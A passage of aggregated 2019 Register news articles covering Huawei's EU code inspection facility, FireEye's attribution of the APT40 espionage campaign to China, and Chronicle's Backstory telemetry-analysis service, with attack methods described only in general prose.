“At Huawei, we have the ABC principle for security: ‘Assume nothing. Believe nobody. Check everything’,” quipped Hu.

Even if some of the security world rejects the idea of Huawei doing the checking, it appears the Chinese company is deepening its ties with the European Union. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/05/huawei_brussels_code_inspection_facility/

Oh no Xi didn’t?! China’s hackers nick naval tech blueprints, diddle with foreign elections to boost trade – new claim

RSA Conference: Researchers claim to have uncovered a five-year Chinese hacking operation aimed at bolstering Beijing’s naval might and trade deals to the detriment of the world’s democracies and maritime hardware makers.

In a report issued conveniently just in time for the RSA Security Conference in San Francisco this week, IT threat watchdog FireEye claimed a group of state-backed hackers dubbed APT40 compromised manufacturers to siphon tech blueprints and intelligence that could be used to modernize China’s navy – and even sought to influence foreign elections.

FireEye’s Fred Plan, Nalani Fraser, Jacqueline O’Leary, Vincent Cannon, and Ben Read explained on Monday how they once thought the cyber-intrusions were the work of two separate crews of miscreants, dubbed TEMP.Periscope and TEMP.Jumper. However, the two operations were in fact merged into one by the researchers, and attributed to a Beijing-sponsored hacking effort: APT40.

Here’s the caper: China hopes to improve its naval fleet with new boats featuring all the modern tech trappings, and so its government-controlled hackers were ordered to steal details of components from manufacturers around the globe. The spies also tried swinging elections in various nations in any way that favored the Middle Kingdom’s “One Belt, One Road” initiative – an effort to improve its international trade routes.

“The group has specifically targeted engineering, transportation, and the defense industry, especially where these sectors overlap with maritime technologies,” Team FireEye claimed. “More recently, we have also observed specific targeting of countries strategically important to the Belt and Road Initiative including Cambodia, Belgium, Germany, Hong Kong, Philippines, Malaysia, Norway, Saudi Arabia, Switzerland, the United States, and the United Kingdom.”

Show us some proof

In pointing the finger at China, FireEye identified the industries and location of the targets – which happened to be relevant to China’s naval interests – and the particular time frame of the hacking: most operations took place during China business hours. The hackers also used servers located in China, and the command and control PCs probed by the researchers all ran Chinese language settings.

Attribution, of course, is hard, and yes, the cynical among us will say this is all planted information to pin the blame on China. On the other hand, this is the conclusion FireEye has come to: it woz Beijing.

In addition to the tried-and-true methods of spear-phishing victims with poisoned attachments to open, the APT40 group also seeded specific webpages with exploit code that tried to install backdoor malware on systems when visited by targets. If infected, the computers could be remotely controlled and spied upon.


From there, it is said the Chinese attackers harvested the infected machine’s account credentials and used those to access other areas of the targeted company’s network and perform reconnaissance. Finally, the hackers archived and exfiltrated any blueprints and intelligence they found, and bounced the lot through multiple machines before finally downloading it to a friendly server.

Interestingly, the focus on maritime technology did not last long. FireEye noted that over the past two years, the group has shifted its attention towards election meddling in countries where China has a trade interest.

“Based on APT40’s broadening into election-related targets in 2017, we assess with moderate confidence that the group’s future targeting will affect additional sectors beyond maritime, driven by events such as China’s Belt and Road Initiative,” FireEye concluded.

“In particular, as individual Belt and Road projects unfold, we are likely to see continued activity by APT40 which extends against the project’s regional opponents.” ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/05/chinas_navy_hacking/

Alphabet snoop: If you’re OK with Google-spawned Chronicle, hold on, hold on, dipping into your intranet traffic, wait, wait

RSA Conference: Google-spawned security outfit Chronicle this week unveiled a service that analyzes telemetry data from customers’ networks to detect cyber-attacks lurking among the rivers of packets.

Dubbed Backstory, the tool will allow IT admins to sift through things like DNS usage, endpoint activity logs, and Cisco NetFlow data to see who was doing what, and when, on the corporate network. Additionally, Chronicle said it will allow customers to compare their logs and telemetry against information gathered by Google and a number of “other sources” to verify whether activities on their systems are legit or malicious, though the Alphabet-backed company says it neither sells nor shares any user data.

“Backstory compares your network activity against a continuous stream of threat intelligence signals, curated from a variety of sources, to detect potential threats instantly,” Alphabet-owned Chronicle said in introducing the new service.

“It also continuously compares any new piece of information against your company’s historical activity, to notify you of any historical access to known-bad web domains, malware-infected files, and other threats.”


The aim of all this, says Chronicle, is to make it easier for companies to track down where attacks are coming from and potentially spot ongoing attacks when they notice that their activity logs match up with the addresses and traffic patterns used by other known hacking operations. We can only hope it’s more user-friendly and less clunky than real-time web-log-parsing tool Google Analytics.

Because Chronicle wants customers to collect and upload as much data as possible – since this is when the service is most effective – Backstory will not charge based on traffic or data volumes; rather, licensing costs will be calculated based on the size of the customer account.

“Building a system that can analyze large amounts of telemetry for you won’t be useful if you are penalized for actually loading all of that information. Too often, vendors charge customers based on the amount of information they process,” Chronicle explained.

“Since most organizations generate more data every year, their security bills keep rising, but they aren’t more secure.”

The service is set to go live later this week with a launch set to take place during the RSA Conference in San Francisco. ®

PS: Speaking of Google, apparently its engineers have been prodding around internally, and allegedly found work still ongoing on Dragonfly, its controversial censored search engine for China.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2019/03/05/alphabet_chronicle_backstory/